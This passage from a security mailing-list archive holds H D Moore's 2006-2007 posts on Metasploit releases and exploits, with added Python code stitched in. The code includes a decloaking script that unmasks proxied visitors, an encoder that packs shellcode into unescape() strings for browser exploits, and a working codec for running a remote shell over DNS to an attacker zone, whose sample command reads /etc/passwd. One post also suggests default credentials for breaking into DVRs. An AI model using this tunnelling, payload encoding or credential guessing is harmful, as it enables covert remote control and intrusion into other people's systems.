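    kind: str         # "http": web hit, "udp": applet datagram, "dns": query at our server
    token: str        # per-visit token carried in the URL and the datagram
    src_ip: str       # peer address as seen by the receiving service
    detail: str = ""  # "udp": internal address the applet reports; "dns": query name


def token_from_qname(qname: str) -> Optional[str]:
    """The token is the label directly under the zone: <token>.decloak.example."""
    q = qname.rstrip(".").lower()
    if not q.endswith("." + ZONE):
        return None
    return q[: -len(ZONE) - 1].split(".")[-1]


def correlate(events: List[Event]) -> Dict[str, Dict[str, Optional[str]]]:
    """Join the three vantage points on the token.  A proxied visitor shows one
    address over HTTP and a different one on the applet's direct UDP path; the
    DNS query arrives from the resolver the visitor really uses, proxy or not."""
    seen: Dict[str, Dict[str, Optional[str]]] = defaultdict(lambda: {
        "http_peer": None, "nat_gateway": None, "internal": None, "dns_resolver": None})
    for ev in events:
        if ev.kind == "http":
            seen[ev.token]["http_peer"] = ev.src_ip
        elif ev.kind == "udp":
            seen[ev.token]["nat_gateway"] = ev.src_ip
            seen[ev.token]["internal"] = ev.detail
        elif ev.kind == "dns":
            tok = token_from_qname(ev.detail)    # token comes from the name, not the event
            if tok is not None:
                seen[tok]["dns_resolver"] = ev.src_ip
    return dict(seen)


def looks_proxied(record: Dict[str, Optional[str]]) -> Optional[bool]:
    """None when the applet never reported (no direct path to compare against),
    which is the 'applet did not load or a race condition failed' case."""
    if record["nat_gateway"] is None or record["http_peer"] is None:
        return None
    return record["http_peer"] != record["nat_gateway"]


# Constructed events (RFC 5737 / RFC 1918 addresses).  Visitor "t1" browses
# through a proxy; "t2" does not; the last query is noise from another zone.
EVENTS = [
    Event("http", "t1", "198.51.100.7"),                          # proxy / exit node address
    Event("udp",  "t1", "203.0.113.9", "192.168.1.23"),           # direct datagram: NAT gateway + LAN address
    Event("dns",  "t1", "203.0.113.53", "t1.decloak.example."),   # the visitor's real resolver
    Event("http", "t2", "203.0.113.40"),
    Event("udp",  "t2", "203.0.113.40", "10.0.0.5"),
    Event("dns",  "t2", "203.0.113.2", "t2.decloak.example."),
    Event("dns",  "xx", "203.0.113.2", "unrelated.example."),
]

if __name__ == "__main__":
    for tok, rec in correlate(EVENTS).items():
        print(tok, rec, "proxied=%s" % looks_proxied(rec))
```

The DNS column is the one a SOCKS4 proxy cannot hide: the query for the token name is made by whichever resolver the operating system uses, so the address that arrives at the authoritative server is the visitor's real DNS server regardless of how the HTTP request was routed.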


Re: [Full-disclosure] Who should i contact?

2006-07-05 Thread H D Moore
I have been receiving spam to unique addresses provided to H&R Block for 
over a year now. If this is the same company you used, you aren't the 
only one. Using an email address with the original company name clearly 
embedded within it makes tracking down this kind of abuse easier. It has 
a side effect of annoying sales weasels that try to follow up after I 
download crappy evaluation software. A quick scan of my mail logs from 
the past week shows 8 different companies that either sold or leaked my 
email address to spammers. 

-HD

On Wednesday 05 July 2006 03:09, [EMAIL PROTECTED] wrote:
> The recent thread on the exposed data containing hospital records
> made me think to ask something here.
>
> I have recently received spam to several email addresses created
> explicitly and solely for filing my US federal taxes online through
> an internet tax filing system. The emails I received are tied to
> four separate filings by four separate people on a COMPLETELY
> unrelated subject through an IP address managed by a completely
> different person than the entity that these addresses were given
> to.



Re: [Full-disclosure] Microsoft SMB Information Disclosure Vulnerability CVE-2006-1315

2006-07-11 Thread H D Moore
Yet another SMB memory leak. There are tons of these in SRVSVC. The key to 
finding them is to force large padding values (i.e. holes between 
DataOffset/ParameterOffset and end of packet). A quick hack is to use the 
SMB ECHO command with a non-aligned byte size. I have yet to see anything 
actually *useful* get leaked. The leak data usually contains parts of 
packets that I sent it previously - my few attempts at testing a busy 
domain controller never leaked anything I found interesting. Maybe McAfee 
found a way to leak larger blocks?

-HD

On Tuesday 11 July 2006 19:41, Alexander Sotirov wrote:
> This is hardly a "description" of the vulnerability. Your post does not
> include any information that was not already included in the Microsoft
> bulletin this morning.



[Full-disclosure] Google Malware Search

2006-07-16 Thread H D Moore
http://metasploit.com/research/misc/mwsearch/?q=bagle

Enjoy,

-HD



[Full-disclosure] Firefox fun

2006-07-28 Thread H D Moore
The demonstration exploit now works on Windows, Linux, and both 
architectures of Mac OS X. A friend of mine reported that it also works 
on the Camino browser:

http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html

Enjoy,

-HD



Re: [Full-disclosure] Firefox fun

2006-07-28 Thread H D Moore
Some of the reported crashes (IE 6, FF 1.5.0.5) could be the process 
running out of memory; the current demonstration uses a huge block of 
memory for reliability reasons. I should be able to tune the memory 
allocation for the final exploit (to be included in the metasploit 
framework). Thanks for all the feedback!

-HD

On Friday 28 July 2006 13:47, H D Moore wrote:
> The demonstration exploit now works on Windows, Linux, and both
> architectures of Mac OS X. A friend of mine reported that it also works
> on the Camino browser:
>
> http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object
>.html
>
> Enjoy,
>
> -HD
>



[Full-disclosure] AxMan ActiveX Fuzzer

2006-08-01 Thread H D Moore
AxMan is now public:
- http://metasploit.com/users/hdm/tools/axman/

-HD



Re: [Full-disclosure] Exploit for MS06-040 Out?

2006-08-09 Thread H D Moore
Core Impact and Canvas both have exploits out. Metasploit technically has 
one, but it hasn't been completed/released yet.

-HD

On Wednesday 09 August 2006 13:10, Matt Davis wrote:
> Did I completely miss exploit code being released in the wild for that
> vulnerability?



Re: [Full-disclosure] Exploit for MS06-040 Out?

2006-08-10 Thread H D Moore
On Wednesday 09 August 2006 13:10, Matt Davis wrote:
> Did I completely miss exploit code being released in the wild for that
> vulnerability?

The Metasploit Framework module is now public, I included a copy of the 
email I sent to the Framework mailing list below.

For the lazy:
http://metasploit.com/projects/Framework/modules/exploits/netapi_ms06_040.pm

--  Forwarded Message  --

Subject: [framework] Metasploit Framework Updates
Date: Thursday 10 August 2006 02:52
From: H D Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]

Hello everyone,

I just pushed out a new round of updates for version 2.6 of the
 Metasploit Framework. This update includes new exploits, new features,
 and massive bug fixes. If it wasn't 3:00am on my birthday I would try
 for a 2.7 release :-)

New exploits:

netapi_ms06-040:
 - This exploit module should work against all Windows 2000 systems and
Windows XP SP0 and SP1. It will not work on XP SP2 or 2003 SP1. There is
a slim chance it can work with modification on 2003 SP0 and NT 4.0 SP6.
The automatic target should be reliable for most users. The cool thing
about this exploit is how it uses a strcpy call to place the shellcode
into a static buffer and then return straight back into it. I have
another version of this exploit that uses a more traditional exploit
method, but there doesn't seem to be much point in releasing it now.

ie_createobject:
 - This exploit module is capable of exploiting any "generic"
 CreateObject vulnerability in an ActiveX control. The current targets
 allow it to exploit MS06-014 and various controls that don't seem to be
 documented or often found vulnerable. This exploit uses the PE "wrapper"
 to download a generated executable containing the selected payload.

eiq_license:
 - This exploit module is one of many for the recent EIQ vulnerabilities.
I pushed this one out because of the amount of work the author put into
it and the lack of cleanup I had to do before including it. The rest of
the EIQ modules will be added and merged as I get time. Thanks again to
everyone who submitted modules for these issues.

realvnc_client:
 - This exploits an older client-side vulnerability in the VNC viewer for
Windows. Thanks again to MC for writing this up.

securecrt_ssh1:
 - This exploits an older client-side vulnerability in SecureCRT. Another
great module provided by MC.

mercury_imap:
 - This exploit module is capable of exploiting the RENAME command
overflow found in older versions of the Mercury IMAP software. Yet
another exploit by MC.

A dozen small bug fixes, new targets, and cosmetic improvements were
included with this update. Thanks to David Maciejak for sending in many
of these and having the patience to deal with my update schedule.

Matt Miller (skape) tracked down a long-time bug in the 'EXE' output mode
of msfpayload. The template executable had an invalid stack size set,
which caused all DLL Inject payloads to crash when initialized from
inside the PE template. This fix should allow you to use the vncinject
and meterpreter payloads with the msfpayload X mode (standalone exe).

The msfpayload tool now has a javascript output format. Simply pass 'J'
 as the output mode of msfpayload to get an unescape()-ready string.

The next 3.0 beta should be ready sometime next week. If I get over my
fear of being owned via subversion, the actual source code repository
for 3.0 will also become public.

Enjoy!

-HD
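
What an unescape()-ready string looks like, as an added example (my code, not msfpayload's 'J' output mode): each %uXXXX becomes one 16-bit code unit that the script engine stores little-endian, so the encoder has to swap every byte pair or the shellcode lands in memory reversed two bytes at a time. The sample bytes and the 0x90 padding for odd lengths are my choices; the page does not say how the tool pads.

```python
def to_unescape(shellcode: bytes, pad: int = 0x90) -> str:
    """Encode raw bytes as the %uXXXX form that JavaScript's unescape() turns
    back into a string.  Each %uXXXX is one 16-bit code unit stored
    little-endian, so the first byte of each pair goes in the low half.
    An odd-length buffer is padded with one byte (0x90 NOP, my choice)."""
    if len(shellcode) % 2:
        shellcode += bytes([pad])
    return "".join(f"%u{shellcode[i + 1]:02x}{shellcode[i]:02x}"
                   for i in range(0, len(shellcode), 2))


def from_unescape(text: str) -> bytes:
    """Model of what the engine does with the string: every code unit, whether
    written as %uXXXX, %XX or a literal character, ends up as two little-endian
    bytes in memory.  Used here to check that the encoder round-trips."""
    out = bytearray()
    i = 0
    while i < len(text):
        if text.startswith("%u", i):
            out += int(text[i + 2:i + 6], 16).to_bytes(2, "little")
            i += 6
        elif text[i] == "%":                    # plain %XX: a single code unit < 0x100
            out += int(text[i + 1:i + 3], 16).to_bytes(2, "little")
            i += 3
        else:
            out += ord(text[i]).to_bytes(2, "little")
            i += 1
    return bytes(out)


# Constructed sample (9 bytes, odd on purpose): xor eax,eax / push eax /
# push 'calc' / push esp.  Recognisable, not a working payload.
SAMPLE = bytes.fromhex("31c0506863616c6354")

if __name__ == "__main__":
    enc = to_unescape(SAMPLE)
    print(enc)                         # %uc031%u6850%u6163%u636c%u9054
    print(from_unescape(enc).hex())    # original bytes followed by the 90 pad
```

A `%XX` form (one code unit per byte) would also survive unescape(), but it doubles the in-memory footprint with zero high bytes between every shellcode byte, which is why payload tools emit the %u form.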



Re: [Full-disclosure] Exploit for MS06-040 Out?

2006-08-10 Thread H D Moore
At some point, depending on time. Feel free to add one :-)

-HD

On Thursday 10 August 2006 06:03, David Taylor wrote:
> Hi HD,
>
> Do you plan on building a 'check' feature into this in the future?  I
> find those to be very handy in scripting checks on our systems.



Re: [Full-disclosure] Exploit for MS06-040 Out?

2006-08-11 Thread H D Moore
The DLLs for XP SP2 and 2003 SP1 were compiled with Visual Studio's stack 
protection flag (/GS). This prevents a standard return address overwrite 
from working. The wcscpy() method everyone is using in their exploits is 
also blocked by another change in how the compiler orders and passes 
arguments.  The standard way to bypass /GS is to use a SEH ptr overwrite, 
but so far, it doesn't seem possible to reach a SEH ptr with the 
overflow, when using the PathCanonicalize method. 


On Friday 11 August 2006 08:40, Brendan Dolan-Gavitt wrote:
> Is there any technical reason that an exploit cannot be developed
> against XP SP2 and Server 2003 SP1? Or is this only a limitation of
> the current Metasploit exploit?



Re: [Full-disclosure] JavaScript get Internal Address (thanks to DanBUK)

2006-08-12 Thread H D Moore
Hello,

I worked on something similar, it uses Java in the same way, but also uses 
a custom DNS server to obtain even more information:

Demo:
http://metasploit.com/research/misc/decloak/

Code:
http://metasploit.com/research/misc/decloak/HelloWorld.java

-HD

On Saturday 12 August 2006 03:55, pdp (architect) wrote:
> http://www.gnucitizen.org/projects/javascript-address-info
> http://f-box.org/~dan/jstest.html
>
> The following technique was brought to me by DanBUK
> (http://f-box.org/~dan/). Dan managed to find the internal IP address
> of the visiting client by establishing a socket between local host and
> the remote web server. Upon success the socket populates its structure
> with all kinds of useful information among some of which are the
> internal IP address and the hostname.
>
> http://www.gnucitizen.org/projects/javascript-address-info/addressinfo.
>js
>
> This technique requires Java, however I think that It should be
> possible to achieve similar result by invoking special ActionScript
> methods from Flash.
>
> POC can be found on the url above.



Re: Re[2]: [Full-disclosure] JavaScript get Internal Address (thanks to DanBUK)

2006-08-12 Thread H D Moore
On Saturday 12 August 2006 12:16, Thierry Zoller wrote:
> OHoh, when can we expect a DNS tunnel, tunneling a shell through your
> DNS requests and DNS answers ? :) A nice remote shell through dns
> tunnel over XSS. LOL :)

Heh. I actually have a plan for doing that :-)

1) Create a metasploit payload for communicating with shell/meterpreter 
via DNS queries and replies. This will not be a 'small' payload by any 
means, but should be feasible for all DCERPC and browser bug exploits.

2) Develop a custom DNS server for *.msf.metasploit.com

3) Provide a registration page where you can request a username/password

4) Provide a DNS sub-domain server in metasploit 3.0. The attacker will 
connect to the metasploit.com web site, post the user/pass, and ask for a 
unique sub-domain that points back to its own address. This can be 
automated by the payload handler.

5) Select a DNS payload, select an exploit, exploit the target system. The 
payload is configured to "talk" to *.uniqueId.msf.metasploit.com, which 
actually runs on the system running the metasploit console.

6) The payload runs, the client resolves the NS record from our server, 
gets redirected to the attacking metasploit console, and communication 
starts.

7) Profit!


The problems with this are:

* Privacy concerns regarding the initial DNS request to msf.metasploit.com 
for the NS record of the attacker. Technically, this could violate a NDA 
if used on a penetration test.

* The framework console would need to bind to port 53 (r00t on unix) and 
be accessible from the internet.

* Need to develop a DNS service running in Ruby. Another time requirement.

* It may not be that useful, but it does seem like a fun hack. With any 
luck, this can be accomplished using the built-in name resolution API in 
windows/unix/etc.

* Really easy to signature if it always uses *.metasploit.com requests.
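
The encoding layer such a payload needs, as an added example (mine, not a Metasploit payload or its DNS service): query names carry data upstream within the 63-octet label and 253-character name limits, and TXT strings carry commands back. The zone `abc123.msf.example` stands in for the post's per-attacker sub-domain, the sample traffic is constructed, and no wire-format DNS is built here, only the names and TXT strings that would go into it.

```python
import base64
from typing import Dict, List, Tuple

MAX_LABEL = 63      # RFC 1035: a label is at most 63 octets
MAX_NAME = 253      # RFC 1035: 255 octets on the wire, 253 in presentation form
RAW_PER_LABEL = 35  # 35 raw bytes -> exactly 56 base32 chars, no padding, under 63
TXT_MAX = 255       # each <character-string> in a TXT RDATA holds at most 255 octets

# Hypothetical per-attacker zone (the post's *.uniqueId.msf.metasploit.com).
ZONE = "abc123.msf.example"


def _b32(data: bytes) -> str:
    # Base32, not base64: names are case-insensitive and a resolver may fold
    # case in transit, which would corrupt a mixed-case alphabet.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def labels_per_query(zone: str = ZONE) -> int:
    """Data labels that fit: "<4 hex seq>." + N * "<56 chars>." + zone <= 253."""
    room = MAX_NAME - len(zone) - 1 - 5
    return max(1, room // (56 + 1))


def encode_upstream(payload: bytes, zone: str = ZONE) -> List[str]:
    """Payload side: split output into query names, each carrying a sequence
    label and as many data labels as the name-length limit allows."""
    per_query = labels_per_query(zone) * RAW_PER_LABEL
    names = []
    for seq, off in enumerate(range(0, len(payload), per_query)):
        chunk = payload[off:off + per_query]
        labels = [_b32(chunk[i:i + RAW_PER_LABEL]) for i in range(0, len(chunk), RAW_PER_LABEL)]
        name = ".".join([f"{seq:04x}", *labels, zone])
        assert len(name) <= MAX_NAME and all(len(l) <= MAX_LABEL for l in name.split("."))
        names.append(name)
    return names


def decode_upstream(name: str, zone: str = ZONE) -> Tuple[int, bytes]:
    """Handler side (the console's DNS service): recover (seq, data) from one name."""
    if not name.lower().endswith("." + zone):
        raise ValueError("query outside our zone")
    labels = name[: -len(zone) - 1].split(".")
    return int(labels[0], 16), b"".join(_unb32(l) for l in labels[1:])


def reassemble(names: List[str], zone: str = ZONE) -> bytes:
    """Order by sequence number; duplicate queries (resolver retries) collapse."""
    chunks: Dict[int, bytes] = {}
    for n in names:
        seq, data = decode_upstream(n, zone)
        chunks[seq] = data
    return b"".join(chunks[s] for s in sorted(chunks))


def encode_downstream(command: bytes) -> List[str]:
    """Handler side: carry a command back in TXT strings.  TXT is case-preserving,
    so base64 is safe here; split to the 255-octet character-string limit."""
    text = base64.b64encode(command).decode("ascii")
    return [text[i:i + TXT_MAX] for i in range(0, len(text), TXT_MAX)]


def decode_downstream(strings: List[str]) -> bytes:
    return base64.b64decode("".join(strings))


if __name__ == "__main__":
    # Constructed: 360 bytes of "command output" going up, one command coming down.
    out = b"uname -a\n" * 40
    names = encode_upstream(out)
    print(len(names), "queries, first:", names[0])
    print("round trip ok:", reassemble(list(reversed(names)) + names[:1]) == out)
    print(decode_downstream(encode_downstream(b"id; cat /etc/passwd")))
```

The sequence label is what makes the upstream direction survive the recursive resolvers in the middle: they reorder, retry and cache, so the handler must accept queries out of order and more than once, and the payload must never reuse a name it expects a fresh answer for (a cached answer never reaches the handler at all). That same property is the signature problem the last bullet points at: a stream of long, high-entropy names under one zone is easy to spot.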



Re: [Full-disclosure] NT4 worm

2006-08-30 Thread H D Moore
The exploit for NT 4.0 is *exactly* the same packet as the one you would 
also use on Windows 2000. I am surprised that this is considered a "NT 4" 
worm and not a "Windows 2000 (+NT 4.0)" worm. Is something specific about 
the exploit they use that prevents it from working on Windows 2000?

-HD

On Wednesday 30 August 2006 10:11, Juha-Matti Laurio wrote:
> Are the machines you have experience especially NT4.0 machines?
> It appears that one of the PoC's (public on Monday 28th Aug) lists the
> following information: "Systems Affected:
> *  Microsoft Windows 2000 SP0-SP4
> *  Microsoft Windows XP SP0-SP1
> *  Microsoft Windows NT 4.0"
>
> but reportedly it is tested against XPSP1 and W2KSP4 systems.



[Full-disclosure] BH/DC: Tactical Exploitation Materials

2007-08-09 Thread H D Moore
At Black Hat 2007 and Defcon 15, Valsmith and I gave a talk 
entitled "Tactical Exploitation". This talk introduced a tactical 
approach to penetration testing that does not rely on exploiting known 
vulnerabilities. During the talk, we used a combination of new tools and 
lesser-known techniques to walk through the process of compromising a 
target network. The materials for this talk are now online, including the 
slides, white paper, and videos. These materials can be found online at:
 - http://metasploit.com/confs/

For those who missed both the talks or couldn't stay for all of one, the 
white paper does a good job of covering the things we discussed:
 - http://metasploit.com/confs/blackhat2007/tactical_paper.pdf

Most of the exploits and tools can be found in the trunk version of the 
Metasploit Framework. These will be merged into the stable tree over the 
next week or so (along with some HOWTOs on the Metasploit Blog). To grab 
the latest version of the Metasploit Framework, you can use the following 
command:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3-trunk
$ ./msf3-trunk/msfconsole

Thanks to everyone who came to our talks!

-HD



Re: [Full-disclosure] BH/DC: Tactical Exploitation Materials

2007-08-09 Thread H D Moore
Good point! I didn't like the intro that much, it will be revisited in the 
next revision :-) Thanks for the feedback!

-HD

On Thursday 09 August 2007 19:24, Hernan Ochoa wrote:
> The only thing I would argue is the concept that your paper is actually
> 'INTRODUCING a tactical approach to penetration testing',  'Revisiting'
> would be much more accurate in my opinion. I don't think your approach
> is new. Having said that, I do think, like I said, that your paper
> comes at the right time because the proliferation of 'exploitation
> frameworks' and their (commonly) direct association with 'penetration
> testing' can  mislead people to believe that penetration testing is
> only that. So congrats again :).


[Full-disclosure] Cracking the iPhone (5 article series)

2007-10-22 Thread H D Moore
The last part of my iPhone-related blog entries was posted last night. The 
first article discusses the architecture and provides some useful 
shellcode for already-modified phones. 
 
http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybe-yours.html

The second article discusses the libtiff exploit and includes a link to a 
modified version of the weasel debugger. 

http://blog.metasploit.com/2007/10/cracking-iphone-part-1.html

The third article steps through the entire libtiff exploit development 
process, using an updated version of the debugger. 

http://blog.metasploit.com/2007/10/cracking-iphone-part-2.html

The fourth article describes a different approach to exploiting the 
libtiff vulnerability that is much more reliable across a wider range of 
applications. 

http://blog.metasploit.com/2007/10/cracking-iphone-part-21.html

The fifth and final article walks through the process of developing a 
payload capable of writing arbitrary executables to disk and executing 
them. The final article closes with a stand-alone shell that can be used 
to gain remote, interactive access to unmodified iPhones, and 
demonstrates how to use this shell to apply the third-party libtiff 
patch.

http://blog.metasploit.com/2007/10/cracking-iphone-part-3.html

-HD



Re: [Full-disclosure] VML Exploit vs. AV/IPS/IDS signatures

2006-09-26 Thread H D Moore
Nice work Aviv! All of these methods, along with a few extras, are 
implemented in the Metasploit 2.6 version of this module. Last I checked, 
not a single AV or IPS could pick it up. This module should work on every 
version and service pack of Windows.

http://metasploit.com/projects/Framework/exploits.html#ie_vml_rectfill

-HD

On Tuesday 26 September 2006 09:04, avivra wrote:
> I've used 5 simple methods, trying to evade being detected by the
> signature: 1) I've replaced the location where EIP should jump when the
> exploit is activated, with a different valid address.
> 2) I've replaced the VML element from "rect" with one of the other VML
> elements. 3) I've replaced the payload with a different valid shell
> code. 4) I've replaced the namespace key with a random key.
> 5) A combination of all of the above.
>
> Please note that when I changed the code using any of the methods, the
> exploit still worked.



[Full-disclosure] Metasploit Framework 2.7 Released

2006-10-30 Thread H D Moore
The Metasploit Framework is an advanced open-source exploit development 
platform. The 2.7 release includes three user interfaces, 157 exploits 
and 76 payloads. The Framework will run on any modern operating system 
that has a working Perl interpreter. The Windows installer includes a 
slimmed-down version of the Cygwin environment. 

Windows users are encouraged to update as soon as possible. A number of 
improvements were made that should make the Windows experience a little  
less painful and a lot more reliable. All updates to 2.6 have been rolled 
into 2.7, along with some new exploits and minor features. 

This release is available from the Metasploit.com web site:
  - Unix:  http://metasploit.com/tools/framework-2.7.tar.gz
  - Win32: http://metasploit.com/tools/framework-2.7.exe

The latest version can be pulled directly from Subversion:
 $ svn co http://metasploit.com/svn/framework2/trunk/

A demonstration of the msfweb interface is running live from:
  - http://metasploit.com:5/
 
This may be the LAST 2.x version of the Metasploit Framework. All
development resources are now being applied to version 3.0. More
information about version 3.0 can be found online at:
  - http://metasploit.com/projects/Framework/msf3/
  
Exploit modules designed for the 2.2 through 2.6 releases should maintain
compatibility with 2.7. If you run into any problems using older
modules with this release, please let us know.

Donations to the Metasploit Project are now tax deductible for US 
entities. Please see the donations web page for more information.
 - http://metasploit.com/donate.html

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
  - http://metasploit.com/projects/Framework/documentation.html

We would like to thank the community in general and the Metasploit
contributors in particular for their support of the project.

Changes since the 2.6 release:

windows:
 * The Windows installer and Cygwin environment have been updated
 * The console size has been greatly improved under Windows
 * Large payloads (meterpreter/vncinject) are much more reliable

msfupdate:
 * The msfupdate tool has been replaced with Subversion
 * All Subversion features (branching, diffs, etc) are supported

meterpreter:
 * The SAM extension now works against NX/DEP systems.  

exploits:
 * Minor cosmetic improvements to many modules
 * 14 new exploits added since 2.6 was released

payloads:
 * The payload staging system is more reliable for large payloads
 * Size reductions and reliability improvements

Enjoy!

- The Metasploit Staff



[Full-disclosure] Metasploit Framework 3.0 Beta 3 Released

2006-10-30 Thread H D Moore
The Metasploit Framework is an advanced open-source exploit development 
platform. The 3.0 tree represents a complete rewrite of the 2.0 codebase 
and provides a scalable and extensible framework for security tool 
development. The 3.0 Beta 3 release includes support for exploit 
automation[1], 802.11 wireless packet injection[2], and kernel-mode 
payloads[3].

Windows users are now presented with a RXVT console and an updated Cygwin 
environment, which greatly improves the usability of the 3.0 interface on 
the Windows platform. 

The Metasploit Web Interface is still in development, but this release 
includes a preview of what the end functionality will look like. The web 
interface provides a "webtop" interface for interacting with the 
framework and uses asynchronous javascript to provide live searching. An 
early version of Metasploit IDE is also included with the web interface.

Downloads for all platforms can be found here:
 - http://metasploit.com/projects/Framework/msf3/#download
 
The latest version can be pulled directly from Subversion:
 $ svn co https://metasploit.com/svn/framework3/trunk/

Unix users may need to install the openssl, zlib and dl ruby modules for 
the Framework to load. If you are using Ubuntu you will need to run the 
following commands:

# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
# apt-get install libdl-ruby

Unix users who wish to try the new web interface will need to install 
the 'rubygems' package and the 'rails' gem. Please see 
www.rubyonrails.com for more information and platform-specific 
installation instructions.

Users of other distributions or Unix flavors may want to grab the latest 
version of ruby from www.ruby-lang.org and build it from source. We 
highly recommend using Ruby version 1.8.4 or newer.

Windows users will need to exit out of any running Cygwin-based 
applications before running the installer or using the Framework. The 
old 3.0 installation should be uninstalled prior to installing and using 
this version.

The release packages include Subversion repository information allowing 
you to synchronize your Beta 3 installation with the live development 
tree. The Windows installer includes a "MSFUpdate" menu item that uses 
Subversion to download the latest updates. Unix users will need to 
install the Subversion client, change into the framework directory, and 
execute 'svn update'.

On Unix systems, Subversion will complain about the self-signed 
certificate in use at metasploit.com. Please verify that the fingerprint 
matches the one below before accepting it:

===
- Hostname: metasploit.com
- Valid: from Jun 3 06:56:22 2005 GMT until Mar 31 06:56:22 2007 GMT
- Issuer: Development The Metasploit Project San Antonio Texas US
- Fingerprint: 1f:a2:8e:ad:14:57:53:75:b7:ab:de:67:e8:fa:17:49:76:f2:ee:ad
===

Enjoy!

- The Metasploit Staff

1. http://tinyurl.com/yadb4p
2. http://www.eweek.com/article2/0,1895,2040914,00.asp
3. http://tinyurl.com/yx5q79
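The fingerprint check described in the announcement can be scripted instead of eyeballed at the Subversion prompt. What follows is an added example, not code from the original post or from the Metasploit project: it pins the SHA-1 fingerprint published above, accepts the actual value either as printed by `openssl x509 -sha1 -fingerprint -noout` or as shown in Subversion's own certificate prompt, and compares it in constant time after normalizing case and colons. The function names (`normalize_fingerprint`, `fetch_server_fingerprint`, `pin_check`) are this example's own. The live fetch deliberately performs no CA validation, since a self-signed certificate has no chain to validate; the fingerprint comparison is the only thing standing between the user and a man-in-the-middle, which is why a truncated or malformed value is treated as a mismatch rather than ignored.

```python
"""Pin the SHA-1 certificate fingerprint published in a release announcement
and refuse to trust a server whose certificate does not match.

Added example; not part of the original post or the Metasploit Framework.
The hostname and fingerprint come from the announcement; the rest is this
example's own design.
"""
import hashlib
import hmac
import re
import ssl

# Value being pinned, exactly as published in the Beta 3 announcement.
PINNED_HOST = "metasploit.com"
PINNED_SHA1 = "1f:a2:8e:ad:14:57:53:75:b7:ab:de:67:e8:fa:17:49:76:f2:ee:ad"

_HEX40 = re.compile(r"^[0-9a-f]{40}$")


def normalize_fingerprint(fp: str) -> str:
    """Canonical form: 40 lowercase hex digits, no colons or spaces.
    Raises ValueError for anything that is not a well-formed SHA-1 fingerprint,
    so a truncated or mangled value can never accidentally compare equal."""
    canon = fp.strip().replace(":", "").replace(" ", "").lower()
    if not _HEX40.match(canon):
        raise ValueError(f"not a SHA-1 fingerprint: {fp!r}")
    return canon


def fingerprint_from_openssl_output(text: str) -> str:
    """Pull the fingerprint out of `openssl x509 -sha1 -fingerprint -noout`
    output ("SHA1 Fingerprint=AA:BB:...") or out of the certificate prompt
    Subversion prints (" - Fingerprint: aa:bb:...")."""
    m = re.search(r"Fingerprint[=:]\s*([0-9A-Fa-f:]{59})", text)
    if not m:
        raise ValueError("no fingerprint found in output")
    return normalize_fingerprint(m.group(1))


def fingerprint_of_der(der: bytes) -> str:
    """SHA-1 over the DER encoding, which is what OpenSSL and Subversion display."""
    return hashlib.sha1(der).hexdigest()


def fingerprints_match(expected: str, actual: str) -> bool:
    """Constant-time comparison after normalization; malformed input is a mismatch."""
    try:
        return hmac.compare_digest(normalize_fingerprint(expected),
                                   normalize_fingerprint(actual))
    except ValueError:
        return False


def fetch_server_fingerprint(host: str, port: int = 443) -> str:
    """Retrieve the leaf certificate the server presents and fingerprint it.
    No CA validation is attempted: the certificate is self-signed, so the
    pinned fingerprint is the only trust anchor."""
    pem = ssl.get_server_certificate((host, port))
    return fingerprint_of_der(ssl.PEM_cert_to_DER_cert(pem))


def pin_check(host: str = PINNED_HOST, port: int = 443,
              expected: str = PINNED_SHA1) -> bool:
    """Fetch, compare, and report; returns True only on an exact match."""
    actual = fetch_server_fingerprint(host, port)
    ok = fingerprints_match(expected, actual)
    print(f"{host}:{port} presents {actual} -> "
          f"{'OK' if ok else 'MISMATCH, do not accept the certificate'}")
    return ok


if __name__ == "__main__":
    import sys
    sys.exit(0 if pin_check() else 1)
```

Usage: run the script before answering the Subversion prompt, or feed the prompt text to `fingerprint_from_openssl_output` and compare with `fingerprints_match`. The comparison uses SHA-1 only because that is the digest the announcement publishes; a pin set up today should carry a SHA-256 fingerprint as well, and the pinned value has to be refreshed whenever the certificate is reissued (the one above was valid only until March 2007).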



[Full-disclosure] Fun with wireless cards...

2006-11-01 Thread H D Moore
Lorenzo's Kernel Fun project:
http://kernelfun.blogspot.com/

The Metasploit 3 exploit module:
http://metasploit.com/svn/framework3/trunk/modules/auxiliary/dos/wireless/daringphucball.rb

Media coverage so far:
http://www.securityfocus.com/brief/344
http://www.darkreading.com/document.asp?doc_id=109535&WT.svl=news1_1
http://blog.washingtonpost.com/securityfix/2006/11/exploit_released_for_unpatched_1.html

More to come :-)

-HD



[Full-disclosure] Microsoft patches the WMI Object Broker bug

2006-11-01 Thread H D Moore
http://www.microsoft.com/technet/security/advisory/927709.mspx

The Metasploit 2 module (ie_createobject)[1] has been exploiting this bug 
since it was released in August. Glad to see they finally noticed.

Thanks to Aviv for noticing / sending me the link.

-HD

1. http://metasploit.com/projects/Framework/exploits.html#ie_createobject



Re: [Full-disclosure] Microsoft patches the WMI Object Broker bug

2006-11-01 Thread H D Moore
Doh. I read too quickly. Ryan Naraine pointed out that there is no patch, 
the advisory just confirms that people are exploiting it.

-HD

On Wednesday 01 November 2006 13:21, H D Moore wrote:
> http://www.microsoft.com/technet/security/advisory/927709.mspx



[Full-disclosure] Wireless fun!

2006-11-13 Thread H D Moore
Shiny new (remote) kernel-mode exploits for Metasploit 3:

http://kernelfun.blogspot.com/2006/11/mokb-13-11-2006-d-link-dwl-g132.html
http://kernelfun.blogspot.com/2006/11/mokb-11-11-2006-broadcom-wireless.html

-HD



Re: [Full-disclosure] DVR (Digital Video Recorders) + hack?

2007-02-09 Thread H D Moore
Try using root:root, root:admin, admin:admin, and radmin:radmin via telnet 
and ssh for these systems:

http://www.linuxforums.org/forum/other-distributions/63848-help-linux-version.html

-HD


On Friday 09 February 2007 05:22, Mark Sec wrote:
> any1 have experience over these "boxes"?, we have many flavors, we
> looking more information about to "howto" hack the firmware, app or
